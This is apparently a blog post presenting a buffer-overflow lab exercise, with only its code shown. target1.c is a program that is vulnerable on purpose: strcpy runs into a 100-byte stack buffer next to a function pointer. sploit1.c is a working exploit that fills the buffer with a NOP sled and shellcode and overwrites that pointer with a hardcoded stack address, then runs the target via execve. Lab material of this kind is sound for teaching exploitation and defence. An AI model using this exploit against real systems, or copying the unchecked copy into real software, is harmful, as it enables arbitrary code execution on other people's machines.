Advertisements
Home > Information Technology, programming, Science, Security > Buffer Overflowing Target 1

Buffer Overflowing Target 1

target1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int gee(){
 return 0;
}

int bar(char *arg, char *out)
{
 strcpy(out, arg);
 return 0;
}

int foo(char *argv[])
{
 char buf[100];
 int (*fp)();
 int canary[10];

 canary[0] = 0;
 fp = &gee;
 bar(argv[1], buf);
 if(canary[0]){
  exit(EXIT_FAILURE);
 }
 (*fp)();
}

int main(int argc, char *argv[])
{
 if (argc != 2)
 {
  fprintf(stderr, "target1: argc != 2\n");
  exit(EXIT_FAILURE);
 }
 foo(argv);
 return 0;
}

sploit1.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"

#define TARGET "/tmp/target1"

int main(void)
{
 char *args[3];
 char *env[1];
 char buf[104];
 int i;

 for(i = 0; i < 104; i++)
  if(i<100-strlen(shellcode))
   buf[i] = '\x90';
  else if(i < 100)
   buf[i] = shellcode[i-100+ strlen(shellcode)];
  else if(i<101)
   buf[i] = '\xb0';
  else if(i<102)
   buf[i] = '\xfd';
  else if(i<103)
   buf[i] = '\xff';
  else
   buf[i] = '\xbf';
 
 args[0] = TARGET; args[1] = buf; args[2] = NULL;
 env[0] = NULL;

 if (0 > execve(TARGET, args, env))
 fprintf(stderr, "execve failed.\n");

 return 0;
}
Advertisements
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

%d bloggers like this: